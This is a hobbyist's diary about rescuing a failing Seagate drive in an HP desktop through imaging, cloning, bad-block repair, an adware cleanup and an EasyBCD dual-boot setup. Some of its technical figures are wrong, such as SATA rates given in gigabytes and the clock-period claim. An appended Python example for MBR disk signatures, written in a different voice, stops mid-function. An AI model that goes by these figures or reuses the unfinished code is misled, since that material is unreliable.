        For starters I have no idea what the sata speed is on my computer (p6510f). I have the box for the Seagate Barracuda drive (bought 2012), and it is 6 Gbytes/sec (sata III?) but says it is backward compatible with 3 Gbytes/sec (sata II). Unfortunately sata in the bios is shown as sata 1. However, the Barracuda manual shows with a jumper plug (short the outer two pins) it can be slowed to sata 1 (1.5 Gbytes/sec).  The drive can also be connected using sata cards PCExxxx, but that's another ball game.

Idea about why clone not recognized
        There are two issues here:
                1) Why didn't the computer boot from the clone via USB when power to the internal drive was removed (sata in). (no idea)
                2) Why was the drive not found when plugged in via sata (alone)?

        I now have a theory for #2. There is a sata speed mismatch problem.
            -- The 1 Tbyte Seagate Barracuda drive I have is 6 Gb/sec (sata III) and backward compatible to 3 Gb/sec (sata II). It can, however, be slowed to 1.5 Gb/sec (sata I) by putting a jumper on the jumper block (now open).

            -- HP p6510f spec on the HP site shows its motherboard sata speed is 3 Gb/sec, which is sata II. However, I discovered a bios setting for sata I with options Enabled/Disabled. I found it enabled. This seems to indicate that the motherboard sata rate can be doubled to 3 Gb/sec. Why it is slowed is TBD. I don't have the internal Seagate specs or the DVD specs. Either of these might be sata 1, or it might just be slowed for more reliability.

          -- Seagate ST3750528AS.  HP spec: 7,200 rpm, 750 Gbyte, sata. Amazingly this drive is still sold (Amazon): $105 for 750 Gbyte, but $68 for 1.5 Tbyte. It is in fact a sata 2 drive (3 Gb/sec) with 32 Mbyte cache. My 1 Tbyte clone drive is just a later model of the Seagate Barracuda with double the transfer speed (sata III, 6 Gb/sec, 64 Mbyte cache?).

p6510f hardware
        Five sata connectors (hard drive, DVD, 3 empty)
                    Spec says internal sata connectors: sata 1, sata 2  (Does this mean some are sata 1, some sata 2?)
        Four memory slots (2 occupied, 2 empty)
        Four empty expansion slots (one long, 3 very short)
                    One PCI Express x16 (Gen 2.0)
                    Three PCI-Express x1 (Gen 2.0)
                    One PCI Express x1 minicard socket (Gen 2.0)
       Motherboard has a Firewire (1394a) connector

Macrium 7th image test
        I now have run both a chkdsk full scan and an HP full scan on the internal Seagate drive. (Didn't see the chkdsk result, but it passed all HP tests.) I am trying different image software, some may be less sensitive to bad blocks. The 7th test image is being written with Macrium. (The disk included with the Seagate drive has their clone software. Should look at that.) There is also the issue of image format, it's possible this may make a difference. Macrium wanted to default to .xml, but I unclicked it. Has a type I don't recognize. It's been going 25 min now and is half done (for all three partitions). System partition quick and done, and now halfway through the c:\ partition, the d:\ partition is done last.

Excluded
        "Data that is recognized as deleted files and unused partition areas are not recorded into the image. Windows pagefiles and hibernation file data are also excluded from a Backup Disk Image because they contain temporary information which is useless to keep and restore." (Macrium) Casper makes the same omission when it clones. This cuts about 15 Gbytes from the image.
        So far, so good. Macrium at 50 min is now 100% through the c:\ partition and 99% total and still going, 96% through the d:\ partition, just 1 more minute. Curiously the K:\ #2 drive shows 0 bytes, unlike Casper where the write progress can be monitored.

Macrium Success (it doesn't shut down on bad block errors)
        Macrium image report: Completed successfully in 53 min! I now find the image written on My Book #2 as 58 Gbyte files with a strange type ('.mrimg'), clearly this is a proprietary format, .mrimg probably stands for 'mr' (Macrium) 'img' (image).

        Looks to me like Macrium is just ignoring the bad block disk errors that are shutting down Windows and Casper. I see a bunch of bad block disk errors during each of the Macrium images of the internal drive. Interestingly during imaging of the clone (also to My Book #2) there are NO disk errors (there are a few other errors, but no Disk errors). So it's pretty clear the 750 Gbyte drive has errors that are not mapped out and that chkdsk can't fix. This could be why Windows got unstable. It's a strong argument for swapping in the clone permanently as the prime internal drive.

                k:\Macrium image OK 4-5-14\7th image test-00-00.mrimg

        Having Macrium do it again. Succeeded again. This time accepted the default of .XML format. I don't understand what they are doing. They ask me for a destination folder (same folder on #2 My Book), then they recommend that the .xml files be stored on the c:\ drive (what?) (c:\user\don\my documents\reflect\my backup.xml). Looks like it is going to put another .mrimg file on #2 My Book. Screen says the .xml can be double clicked to run it. .xml are human readable script files.

        Unlike Casper or Windows, Macrium will image the clone (old 3-31-14), so I am doing that now.

Here's the .xml header
         <!-- -->
         <!-- BDF v2.0.0 Image and backup definition file for Macrium Reflect v5.0 -->
         <!-- -->
          <!-- This file is a template XML to enable a Reflect backup or Image to be initiated from VB Script or an -->
          <!-- MSDOS batch file. -->
         <!-- Simply modify this file if required and pass the file name as a parameter to reflect.exe. -->

Next steps
        Ok, Macrium has successfully done three images, all to My Book #2: 2 of the internal Seagate (each 58 Gbyte) and 1 of the clone (48 Gbyte) in proprietary Macrium format.

        -- Change bios sata setting: Disable Sata 1 (who knows if this affects all or only some sata connectors)
                            Nope, no boot with internal drive when sata1 Disabled.
        -- To see if I can get the clone recognized via sata it is probably conservative to just plug it into an open connector. This is how Seagate recommends you go about cloning a drive. Plug it in as a 2nd drive and run the Seagate disk with clone software. (It's a bitch to get plugged in to the open connectors. Need to map how they are keyed.)

Clone and image progress (4/6/14)
        I was getting really worried that all my hard work in the last month reinstalling Windows and all my programs on my old internal hard disk was falling apart. I have been really stymied in the last few days trying to make backup images. Seven attempts in a row failed using Windows and Casper image backup to various backup drives. They go 30-60 min and exit with the error message 'device not ready'. I can see with Windows event viewer several disk errors (bad block on disk0) being reported, and this causes them to quit. Online I find experts complaining that most image backup programs fail too easily when hitting bad sectors, almost none offer the option to skip over bad sectors. What is especially galling is there was no hint from any of these programs or event viewer where the bad blocks are, not even what disk they are on (though common sense would say it's probably the source disk). Full disk and repair scans with both Chkdsk and the HP utility did not fix the bad blocks. Also neither program would allow imaging of my first clone backup.

Progress -- Macrium image rides over bad blocks
        Macrium image appears to be more robust to bad blocks, it did not stop, and reported success. It twice made an image of the internal 700 Gbyte drive without complaining, and it also allowed the first clone (via USB) to be imaged and that went fine. With event viewer I could see a few disk errors had been reported when imaging the internal 700 Gbyte drive, but no disk errors reading off the new 1 Tbyte Seagate where the clone is.

More progress -- Casper clone identifies files with bad blocks
       More progress is shown below. Finally information on what file contains the bad blocks! With a Macrium image made of both the internal and clone drives last night I had Casper reclone the internal drive (from scratch, not a differential backup). It went to completion riding over bad blocks and in its report it identifies as 'Exceptions' the file(s) it could not copy. Yea!

        The file (above) that Casper clone had trouble with is not an important file and can be deleted. It is just a cache of thumbnail images used to speed up an Explorer directory in image mode with lots of picture images. Anyway I copied the file first with Explorer, then deleted the original. This should recover what is possible and have made the bad blocks unused.

More, more progress --- SeaTools for Dos 'repairs' bad blocks
        Hopefully two nice tools from Seagate (only for Seagate drives) have cleaned up my old Seagate hard drive. The 'SeaTools for Windows' long test verified that I do indeed have bad blocks on my 700 Gbyte internal drive. However, it can't repair bad blocks from Windows and recommended I run SeaTools for DOS, which can. This required downloading an ISO file which is bootable and burning it to DVD. (They said Windows 7 could do this, but I tried and it just copied the ISO file to disk without expanding it! PowerISO did the job nicely.) The DVD boots and loads the dos program into ram, so the hard drive is not being used and can be worked on. The long test took five hours and it found 50 to 100 bad blocks. I selected 'repair all' and SeaTools for DOS then reported post repair that the long test had been PASSED. So hopefully the bad blocks have been found and marked off. Windows boots up OK, post repair.

        Next step run a Windows image and another Casper clone. This should tell me if the old Seagate drive has been cleaned up.

        I put this nice Seagate recovery DVD in my recovery packet. I may need to run it again if the drive develops more bad sectors. It's also an indication I need to figure out how to get the new Seagate swapped in as my regular internal drive.

Windows image succeeds (4/7/14)
        With bad blocks removed by the Seagate DOS tool a Windows image to the J:\ drive succeeded (1 hr). A check of event viewer during the image write shows no disk errors, unlike before where there were always half a dozen or so.

        Unfortunately the image will need to be deleted because my system is not clean. I may have picked up a rootkit (maybe from the PowerISO download) called: Sendori. Maybe I should try a system restore, I don't think it can bring back the bad blocks and I don't know how this will affect it. I've checked a lot of my programs and most everything works, EXCEPT, Opera is throwing up repeated security windows. I first thought this was from the bad blocks removed, but all the windows say illegal site certificates (for Comcast, google, etc) are all signed by Sendori! A check online shows it is likely a rootkit.

Sendori (or Alureon) rootkit symptoms
       One poster said to check disk configuration and if you can't see your disks you are not infected. Well I have used this Windows asset repeatedly and this morning it doesn't work, when I hit 'Computer management' it doesn't come up.
1) Open a COMMAND PROMPT with Windows-R: Type cmd and press enter.
Open DISKPART: In the new window type the command diskpart.
At the new prompt enter lis dis. Your computer is infected with the rootkit Alureon if it remains empty. If the disks display, it is not. (They display)

2) From the Computer Management pane, launch DISK MANAGEMENT.
Everything is fine if it shows disks. If it does not show disks, it means the system is infected with this rootkit. (didn't show, now it does)
        http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/how-to-remove-sendori-malware/a35e5c4b-63c5-4a59-abab-669a76717ed9

My Opera weirdnesses and the fix
       On Mon morning the Sendori problem I had was with Opera. It was basically unusable, because with every site access or (5 min) Comcast mail check it would throw up a site security warning asking if I would approve or reject the site certificate, showing every site was signed by Sendori. Very weird. Agent Ransack shows at 3:22 AM (4/7/14) when I installed PowerISO to burn the Seagate DOS utility, at the same exact time a crap package called PureLeads was installed too. Both of these programs could be uninstalled, so before I went to System Restore to roll back the system, I tried the uninstall. Surprisingly this seems to have worked. No more site security warnings since, and the poster test for Sendori (above) says no rootkit. Agent Ransack and two virus searches come up clean, so it looks like I am rid of this recent pest.

        Footnote: I soon found I still had an Opera problem, most sites were OK, but Google would not come up! I quickly fixed it. An hour earlier while trying to trace down the site security warning, I had made a change to an Opera security setting. Apparently Google didn't like this and when I changed it back Google was happy and Opera was OK. I have zero understanding of browser security, this is deep in the weeds. In Opera preferences, advanced, security, security protocols the default is a check mark on the first two (of four): Enable SSL 3 and Enable TLS 1 (TLS 1.1 and TLS 1.2 are not checked). When I removed the check mark on TLS 1, Google would not load, when I put it back everything was OK.

Finally a stable system? --- Yikes, more bad blocks!
        Thinking I finally had a stable system, bad disk blocks marked, and recently downloaded pests cleared out. But when I went to make a Windows image Mon morning, I had an unhappy surprise, it failed. Same as before, 'device not ready', and the event viewer showed the same bad block disk error. Clearly my old Seagate 700 Gbyte drive is not in good shape and is failing. Less than a day after a five hour low level Seagate DOS scan and passing, it has new bad blocks. It may be the reason Windows went bad a month ago.

        So I had Casper do an update to my clone drive (via USB), knowing that would both give me a backup and would identify the file with the bad block(s). It found bad blocks only in this one file: C:\Users\Don\AppData\Local\Opera\Opera x64\vps\0009\wb.vx (who knows what this does). I am having Macrium, which will skip over bad blocks, do another image backup. Well, not this time; it went about an hour and aborted, reporting bad blocks (in the c:\ partition).

How to manage two hard drives
        To me the obvious best thing to do for a robust system is to have a clone drive (or two) that can be easily switched in. By easily I don't mean opening the case and physically swapping drive cables on the motherboard! What I want is two drives inside, where I can electrically pick which one is active or primary. Not a RAID configuration, but two separate drives where I can decide when to do a clone of the primary. Ideally I could electrically, maybe with a dual boot, swap in the clone for the primary. I have been reading about computers with two drives and don't find this, which I find totally amazing. One poster to a forum asked for something like I want, and one reply suggested an external hard drive in a 'tray' or external drives connected via esata. What is esata?

Esata solution?
        I had noticed esata connectors on some of the enclosures for internal drives on Amazon, but did not know what it was for. Clearly from the name it must be related to 'sata' which is the universal serial data cable used to connect hard drives and DVD players to the motherboard. Wikipedia (esata) has this:

        SATA is a computer bus interface for connecting host bus adapters to mass storage devices such as hard disk drives and optical drives. eSATA is a SATA connector accessible from outside the computer, to provide a signal (but not power) connection for external storage devices.

        eSATAp combines the functionality of an eSATA and a USB port, and a source of power in a single connector. eSATAp can supply power at 5 V and 12 V.

        On a desktop computer the port is simply a connector, usually mounted on a bracket at the back accessible from outside the machine, connected to motherboard sources of SATA, USB, and power at 5 V and 12 V. No change is required to drivers, registry or BIOS settings and the USB support is independent of the SATA connection.

        eSATAp throughput is necessarily the same as SATA, and USB throughput is that of the USB version supported by the port (typically USB 3.0 or 2.0). eSATAp ports (bracket versions) can run at a theoretical maximum of 6 Gbit/s (bits per sec) and are backwards compatible with devices such as eSATA 3 Gbit/s (SATA Revision 2) and also at 1.5 Gbit/s (SATA Revision 1).

        Well that sounds promising. But what kind of speed can it have with two connectors in the path? The sata cable clock rates are really, really high; sata 3 (6 Gb/sec) uses a 6 Gbyte clock frequency with a period of 166 psec! (I confirmed this from an Altera IC spec.) Wikipedia shows esata data rates the same as sata rates. (Really.) Esata uses a combo connector that functions both as an esata and USB connector. Also interesting. It's new, only 2008, and sort of a bastard child, as neither the USB nor sata standards people have really adopted it. It is, however, being built into some new computers, including by major builder HP, and it is on some external enclosures for sata drives.

        So on a quick look I find this. A quasi-standard has developed, supported in some of the inexpensive hard drive enclosures on Amazon, to port the sata to outside the computer. HP is reportedly including esata in some new machines. Since my machine has no esata port, it would require adding a card. Of course, I could probably add a card to get USB 3 too, and it has almost the same speed as sata 3. Maybe combo cards are available. An Amazon search shows cards for $30-40 are available, but available too for $6-7 are simple brackets. These are nothing more than a back panel bracket with one (or two) sata connectors that internally connect to cables that just plug into a sata connector on the motherboard (I have three open). In other words it just, in a neat way, brings the sata port to the outside of the computer, where a cable can then be connected to an esata connector on an external hard drive enclosure. While it would allow drives to be connected and disconnected by hand from outside, it would be somewhat inconvenient in that, due to short cable lengths, it would be a connection at the back of the PC.

        Most Amazon reviewers report the esata brackets work. They can hook up external drives; they show up in bios and work OK. One reviewer suggested it was better to use a sata 2 hard drive externally (twice the clock period compared to sata 3), and this makes sense to me. This bracket is just a neater version of the expansion sata cables I was going to hang out of the drive. The problem I see is length. The max sata cable length (sans connector) is 1 meter, and to run the cable from the hard drive in the front all the way out the back and to the front of the motherboard where the sata connectors are all located could easily (with slack) exceed 1 m. (Maybe I could find a power bracket and route my internal hard drive through an open bracket and back in. Then externally I could kill the power to the internal hard drive.)

        Here are the (theoretical) speeds from Wikipedia:

 SATA Rev1:    1.5 Gbit/s
 SATA Rev2:    3 Gbit/s
 SATA Rev3:    6 Gbit/s
 USB 2.0:      480 Mbit/s
 USB 3.0:      5 Gbit/s

Esata controller card solution?
        What I want to do looks like it can be accomplished with a 2 port, 5 Gb/sec esata card. This inexpensive ($32) small card looks like it would fit (PCI Express, and I have three of these slots open). It would in effect allow me to move the internal hard drive outside the computer. I would have two sata drives in enclosures with esata ports, one primary and one clone secondary. When I wanted to run on the clone secondary, I would just pull the plug on the primary. Reviewers report better speed with the card than USB. One issue would be that I might need a power strip to power the computer and the two external hard drives on/off; otherwise the hard drives will spin all the time (maybe!).

        Another attractive option is a cheap ($20) PCI Express card (700 reviews) that adds four USB 3.0 ports to the computer. USB 3 (theoretically) has almost the same speed as sata 3 (6 Gb/sec), about x10 faster than USB 2, but file transfer timing tests show that in practice it is often more like x2 the speed of USB 2.

Seatools for DOS repair (2nd time) (4/8/14)
        For the 2nd night in a row I did a repair scan of the internal drive. About the same result as before, about 200 bad sectors, mostly together and close to where the bulk of the failures were earlier. This time it fails a short test, but 'Passed long test with repairs'. Clearly I have a bad region on the disk and then a few scattered bad sectors. I have no idea if my current 50 Gbytes of data, only about 7% of the space on the 700 Gbyte drive, is anywhere near the bad area. Clearly what would be nice is a utility to move the working area of a drive. I should look at Seagate and WD to see if anything like this exists.

        Boots up OK and on a quick look the system is clean and OK. My goal now is not to rescue this drive, but simply to get (at least) two backups, an image and a clone, both to use for a new internal drive and to rescue my month of work rebuilding my system (March 2014) for the future. Now to get some clean images with everything OK:

Clean image/clones (4/8/14)
        1) Windows image to K:\ #2,  File format: .vhd, successful (40 min) --- System OK, clean, 4/8/14
                 Note, the top level directory, WindowsImageBackup, has an older date, 4/5/14, but the subdirectory (Windows7_HP) is dated 4/8/14. Besides the three image files for the three partitions, there are a whole bunch of .xml files (in the same directory) whose purpose I don't understand yet. 59 Gbytes total. A day earlier Windows image produced only two .vhd files and no .xml files. I don't understand why the differences, as there are no option selections in a Windows backup, the three partitions of the internal drive being already pre-checked.

        2) Macrium image to K:\ #2,  File format: .mrimg (proprietary)    successful (46 min, uncompressed selected) --- System OK, clean, 4/8/14
            Produces a single 53 Gbyte file in proprietary format. Macrium also has the ability to image the clone (via USB), which other image programs grey out. Macrium makes .xml files too (option), but it puts them in a different place: c:\users\don\documents\reflect. [Header in the Macrium .xml file:

<!-- -->
<!-- BDF v2.0.0 Image and backup definition file for Macrium Reflect v5.0 -->
<!-- -->
<!-- This file is a template XML to enable a Reflect backup or Image to be initiated from VB Script or an -->
<!-- MSDOS batch file. -->
<!-- Simply modify this file if required and pass the file name as a parameter to reflect.exe. -->
]

        3) Casper image to J:\ #1,  File format: .vhd (selected 'standard' file),  successful (2 hr, 5 min) --- System OK, clean, 4/8/14
                    Selected standard format. Casper writes one .vhd file (56 Gbyte) for all three partitions, whereas Windows image writes three .vhd files, one for each of the three partitions on the internal drive (System, c:\ and d:\ recovery). Casper is slow, about 2 hr, vs 40-50 min for Windows and Macrium images. I don't like that the Casper progress window does not give the path of the destination drive, so you cannot check if you are writing to the right USB backup drive. Casper doesn't write any .xml files. In fact, unlike Windows image, which writes a whole bunch of files on every image backup, Casper only writes this single file (clean). Can Windows use this Casper .vhd file to recover? Who knows, need to ask Casper this.

Computer hard drive architectures
        There are two high speed serial buses in use to connect hard drives to computer motherboards: USB and sata. USB is well standardized, hot pluggable, currently with two speeds, and is used only externally. Sata is well standardized, currently with two speeds, hot pluggable (sort of) and used internally. In the last few years, in a semi-standardized way, the sata bus has become accessible outside the computer case.

        The external sata connector is called esata and is data only. (There is also a variant called something like esatap that adds power pins for feeding +5V and +12V from the computer to the drive.) In its simplest form the esata connector, physically on an expansion bracket, is just plugged into a sata connector on the motherboard with no buffering. This kind of gives me the willies, but it is cheap, and from a data signal integrity viewpoint it looks risky given the very high clock rates. However, esata cables are sold at 3 ft and 6 ft lengths (plus another foot or so inside), and I read they work. Better (probably) are plug in cards that provide sata signals through an esata connector on the mounting bracket. Physically a sata cable is two data pairs with a ground between and a ground on each edge, for a total of seven pins. In other words the data paths are each a (flat) transmission line composed of two side by side wires with a ground wire on either side. The signal quality issue depends on the impedance mismatch introduced by the esata connector, and note that with a simple bracket type esata connector there are two esata connectors in the path from the motherboard to an internal type sata drive when mounted in an outside enclosure.

        Nevertheless I am buying the hardware to try running a drive outside via esata. I paid $10 extra to get a 3.5" drive enclosure that has both an esata port and a USB 3 port. I am also buying a card to add four USB 3 ports to my computer. One of my 2 Tbyte data drives has a USB 3 output. USB 3 for a drive would probably be more reliable, but it is not at all clear that this configuration is bootable. I had my bootable clone drive connected via a sata-USB 2 converter for ten days and was not able to get it to boot off the USB drive. Well, there's a caveat: msconfig would tell me it booted from the clone, but it mattered little since the clone desktop did not appear, nor would the clone files show up as c:\.

        There are three basic internal/external drive combinations (below) combined with three ways to control sequencing: two in bios and the EasyBCD boot utility. This is a lot of boot options, and from my reading it's pretty much a black art which combinations work and how to set them up. Poster after poster complains that he added a 2nd drive to his computer and he can't get the computer to either recognize it or boot from it, and 'solutions' are generally simplistic or incomplete. Nowhere have I seen a good overview of all the options.

        But by doing a whole lot of testing, a lot of boots of various combinations systematically, I have made some progress. When I opened the computer and disconnected power to the internal drive and plugged in the clone to an open sata connector on the motherboard, the clone booted with its files and desktop. This confirms that it had been bootable during my failed USB booting tests.

    1) Two sata (or esata) drives --- Obviously with all drives on sata (or esata), both drives could be outside, or one inside and one outside, because the computer can't tell the difference. The computer thinks it has two internal drives. If both are bootable and both outside, obviously one that goes bad could just be disconnected by pulling its cable.

        The tricky part was figuring out if it was possible to mount them both inside a closed case and to switch between them. Yes it is, and I figured out two ways to do this. The first way is to switch the power of individual drives on/off with back panel switches. The second was the proper way to set up a dual boot using the boot editor/utility EasyBCD. This option allows the controlling drive (with its desktop and programs) to be selected at boot while the non-selected drive is still visible as a data drive (f:\).

Internal sata clone drive with separate drive switched power
        My first success was to show that with both the internal and clone drive connected to sata I could switch from one to the other just by switching their power connectors, i.e. powering just one at a time. I have bought (ebay) a rear panel bank of switches that will do just this for drives mounted internally. It is just a bank of four simple (very low Ron) fet switches controlled by pushbuttons. This provides one way that a clone hard drive could be mounted inside and work as a clone. Power both drives and do the cloning (only 20 min for 50 Gbytes over sata). Power off the clone so it is isolated. If the main hard drive goes down, switch off its power, and switch on the power to the clone.

Clone drive switched in via dual boot (EasyBCD)
        After systematically testing a bunch of boot sequence options, I found one that works! This is a nice option in that no hardware change is required to switch over to the clone drive or to do the cloning. You just select which of two internal bootable Windows drives you want to be in control, i.e. to bring up its desktop and its programs as the c:\ drive. (A boot sequence option can be combined with power switches to take the clone off line to protect it from being overwritten.)

    2) Two USB drives --- TBD

    3) One sata drive (internal) and one USB drive --- This is a common configuration. For weeks now one of my external USB drives has been an internal style sata drive, externally powered and connected to the USB port through a (dandy) sata-to-USB converter, and I have used this drive as a clone drive. I have EasyBCD set up to allow me to boot from this USB clone, and Windows built-in msconfig.exe tells me that in fact it supplies the OS. However, even if I am booting from the external USB drive I find the internal sata drive desktop and programs always (to date) show up as the c:\ drive with the clone drive files and programs on f:\.

        Since I did these USB tests, I have learned more about how the boot sequence works, so it might be possible to get the USB drive to control with the internal sata drive as an f:\ data drive, but I wouldn't bet on it. I might go back and do more tests.

    4) One USB (bootable) drive, no internal sata drive --- A key question is whether this option works. I suspect it does, but have yet to pull my internal sata cable to check it. It is amazing that in all my online research, I have not seen a single detailed discussion of this option.

Externally power an internal drive
       One cool idea just occurred to me. What is the safest, easiest way to disable the internal drive physically, if this is necessary to allow a USB clone to take over, which at this point it seems to be? Just power it externally with a widely available PS brick (+5, +12V @ 2A), one of which I already have. Just remove a bracket in back and use a long power expander cable to connect it up to the brick. There are some issues with what to do about power to the drive when the computer is off, but from a data signal integrity point of view it is clean. [1 Tbyte Seagate clone on sata spins down when the drive is off] Another simple but somewhat kludgy option is to power the internal drive through two expansion power cables that plug together, with the connection between them just hanging outside the computer through a hole made by removing a bracket. (Might have a minor effect on fan airflow inside the case.) I later found the bracket power switches, which do the same thing, but are a lot cleaner.

All about boot sequencing (4/11/14)
        Only after working this problem intently for days did I find, largely by trial and error, a boot sequence that achieves my goal. With both drives powered, which means they can both be mounted internally if I want, I can switch between them easily at boot without having to fiddle with the bios. The boot pauses briefly asking which (named) drive you want to boot, and if there is no keyboard selection it just continues the boot to the main drive. Using the boot utility EasyBCD the drive names, drive order and wait time are all programmable.

        My first round of boot tests was a failure. I tried all combinations of boot menu (Esc) and EasyBCD options and every combination that booted (some didn't boot) brought up the desktop and programs of the internal drive with the clone drive visible too, its c:\ drive showing up as the f:\ drive. But in a second round of boot tests I found a combination that works. This combination used EasyBCD set up differently and changed the boot sequence not with Esc (boot menu), but by one time going into Bios (via F10 Setup) and changing the drive boot sequence.

        With EasyBCD installed the boot sequence is very complicated. There are three separate ways to change the boot sequence, all in some sort of cascade where it is not clear which overrides which, plus several ways to set up EasyBCD. At first totally confusing, but with a lot of testing and some reading I have at least some grasp of what is happening.

Bios sequence options
        Let's start with the bios. In my HP machine there are two separate ways at boot to change the drive sequence! Why? Who knows, but my guess is that the simple 'boot menu' (Esc) option was added to make it easy to make a temporary (one time) change to the boot sequence. The Esc key at boot just brings up a list of boot devices the bios sees and allows you to scroll down and select one to boot from. The other bios sequence option is the classic bios menu choices, including boot, accessed in my HP computer by choosing 'setup' (F10) at boot. Here you can go in and change the priority order of the hard drives, which is saved into CMOS memory so it's permanent until a new choice is resaved.

        Priority? I had assumed, because it was the only thing that made any sense to me, that if the Esc (boot menu) option is entered its sequence would override the CMOS bios sequence. However, now I am not so sure, since it was only when I made a change to the CMOS drive sequence that I was able to get my dual boot sequence to work.

        When trying to set up a dual boot, what is so confusing with sata drives at first is that there appears to be no way to specify a particular drive. Unlike IDE hard drives, which use jumpers to set a master and slave, with sata drives there is no hardware setting for master or slave. It makes installing the drives easier, but then how does the boot system or OS know which drive to select?

        One thing I figured out is that the sata connectors on the motherboard are numbered #1 to #6. These sata connector numbers show in the bios as a list of devices plugged into sata 1 to sata 6, each entry in the list showing the manuf part number of the drive or DVD player plugged into that connector. The sata connectors on my motherboard are also different colors. Detailed online HP documentation for my computer does not identify the numbering of the sata connectors. The bios indicates that HP at manuf plugged my computer's single hard drive into sata 1, and the DVD player is plugged into sata 2. (The DVD group normally has priority over the drive group.) As I moved my clone drive sata cable from one free connector to another, I could see the move in bios and from this figure out the number of the motherboard connector.

         I now suspect the motherboard sata connectors form a default drive boot sequence. Of course, the drive boot sequence (by manuf part numbers) can be changed in boot CMOS memory, so there is no hard requirement on connectors to use for a particular boot sequence.

EasyBCD dual boot program
        This is a nice program, free, and from what I read the standard way to set up a dual boot. Once you figure it out, it makes control of boot easy with lots of useful boot tools. I plan to continue to use it to control my dual boot two drive system.

        Initially this program was intimidating, a total black box, probably some sort of low level boot control that I had no interest (or hope) in fathoming how it worked. I never found any sample EasyBCD dual boot setups, which would have been very helpful, so I resorted to trial and error. From reading about dual drive setups I began to suspect that EasyBCD was really at heart sort of a Windows editor for boot, just an easy way to set boot parameters that can be set manually (with great effort) in Windows. Msconfig has a boot section that allows some boot options to be set (like a time out for default), but other boot configuration choices, names of drives, IDs of drives, require tricky command line queries and setups. 'BCD' is where the boot info is stored in the boot section of the drive, and the program EasyBCD just makes it easy to set this up. Hence the name!

        The heart of my confusion in setting up EasyBCD is how to have an option select a particular drive. The EasyBCD setup shows a drive letter for the boot program, like c:\ or f:\, but what does this mean? In each of my desired options the boot file will come from its c:\ drive and the boot program on the other drive will be at f:\. So how do I get the drives to change places? Not at all clear. I still don't fully understand it, but I like it and plan to continue to use it to control my dual drives.

Reading EasyBCD documentation
        Only after a lot of trial and error testing, and finally getting dual boot to work, did I dig into the EasyBCD documentation on how to set up a dual boot. It's hard to find, but the procedure works. When I deleted my earlier settings and did it their way I was able to change the drive boot order in the bios and the dual boot still worked. There's a little trick to setting the entries for a dual boot, which is not that easy to find in its documentation. Here's the key instruction:
** Adding a Windows Vista/7/8 Entry
        3) "Select the letter of the drive/partition Windows is installed on from the drop-down menu (e.g. “c:”). It’s important to note that the Drive Letter must be the one currently visible in My Computer that points to the drive that Vista/7 is installed on. Even if the drive letters change from install to install, use the drive letters as they appear in your current boot. EasyBCD will automatically convert them to the proper drive and partition numbers that can be understood by the Windows bootloader."

Translation --- When I boot from my main (750 Gbyte) internal drive, the files and programs on this drive are my c:\ drive and the files and programs of the 1 Tbyte clone drive are the f:\ drive. Here's what the EasyBCD instructions above mean in my case. Starting with zero entries, add an entry, call it say the 'c drive', and assign it letter c:\. Then add a second entry, call it 'f drive', and assign it letter f:\. That's it; if both drives are bootable you have a dual boot!

        The names entered will appear as menu choices during a pause in boot. 'c drive' should select a boot from one drive and 'f drive' the other. Now check out which name goes with which drive, open EasyBCD and rename the choices with the names of the drives. There's no need to figure out the drive ID numbers. If the Windows files of the other drive currently show in the directory as say the f:\ drive, you only need to select f:\ from the pull down menu. EasyBCD will figure out the details of how to identify each drive for the bootloader.

        Note EasyBCD says it can also easily make a drive bootable. This looks interesting; however, I didn't use it or play around with it, because my clone software (Casper) had already made my clone drive bootable.

        I took pictures of EasyBCD screens with my BB tablet as I tried various boot combinations. I found the drive that booted would always show its bootloader on the c:\ drive. The drive not booted would always show its bootloader on the f:\ drive. The same screens for each selection show a drive ID, called 'BCD ID'. This is critical. This is (I think) the infamous drive 'signature' written into the boot sector. All the drives in the system will have a different 'signature', and by screwing around I was able to get EasyBCD to display it for my two drives.

Collision signature
        One of the needlessly, horribly confusing things about Windows with multiple hard drives is 'collision signature'. If two drives have the same ID (signature) in their boot sector, Windows can't tell them apart, so one just disappears. I read poster after poster wailing about this. I first ran into this myself a couple of years ago when I bought a second 2 Tbyte WD USB drive of the same exact model I had. I found only one would work at a time; when I plugged both in, one dropped out. This is freaking ridiculous! WD, even though aware of this, includes no warning, no help, so I was not kind about this in my Amazon review of the drive. The 'fix' took hours to figure out. It was suggested in a WD forum that plugging the drive into a different computer might help, something about the new computer changing the signature. Why or how this would do anything, I don't have a clue, but in fact it worked. I plugged my new 2 Tbyte USB drive into the USB port of my old Vista portable for a few minutes, and it then worked OK, and has continued to work OK, in Windows 7. Isn't this freaking ridiculous? It seems to imply that a computer is writing to the boot sector of a data (non-bootable) USB drive, which seems very odd. At this point how the signature works is just a big mystery. I see little written about this online.

        So the obvious question is, doesn't a clone have the same ID as the main drive? Or do the clone software packages change it? I need to research this at the clone houses, but to date have seen nothing on this anywhere. Some combinations give me no boot. Is collision signature the reason? How do you change the ID signature anyway? I know there is a command line way to do it and even tried it. Is this what fixed my problem? Possibly.
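        For an MBR disk the 'signature' is a four-byte value at offset 0x1B8 of sector 0, just ahead of the partition table, so a sector-level clone carries the same signature as its source. Here is an added example (not from the essay, and not how Casper or EasyBCD do it) that reads the signature from constructed boot sectors, reports a collision, and gives the copy a fresh signature while leaving its partition table untouched; the partition layout and signature values are constructed, not the author's drives.

```python
"""Detect and repair MBR disk-signature collisions on raw 512-byte boot sectors.

Added example, not from the original essay. The only real layout facts used
are the MBR offsets below; the sectors themselves are constructed in memory.
"""
import secrets
import struct

MBR_SIZE = 512
SIG_OFFSET = 0x1B8          # 4-byte "NT disk signature" that Windows keys on
PART_TABLE_OFFSET = 0x1BE   # four 16-byte partition entries follow
BOOT_MAGIC = b"\x55\xAA"    # last two bytes of a valid MBR


def build_mbr(disk_signature, partitions):
    """Build a constructed MBR with the given 32-bit signature.

    partitions: list of (bootable, type_byte, lba_start, sector_count).
    CHS fields are filled with 0xFF as modern LBA-only tools do.
    """
    sector = bytearray(MBR_SIZE)
    struct.pack_into("<I", sector, SIG_OFFSET, disk_signature)
    for i, (bootable, ptype, lba_start, count) in enumerate(partitions[:4]):
        off = PART_TABLE_OFFSET + 16 * i
        struct.pack_into("<B3sB3sII", sector, off,
                         0x80 if bootable else 0x00, b"\xff\xff\xff",
                         ptype, b"\xff\xff\xff", lba_start, count)
    sector[MBR_SIZE - 2:] = BOOT_MAGIC
    return bytes(sector)


def read_disk_signature(mbr):
    """Return the 32-bit disk signature, refusing sectors without the 55AA marker."""
    if len(mbr) < MBR_SIZE or mbr[MBR_SIZE - 2:MBR_SIZE] != BOOT_MAGIC:
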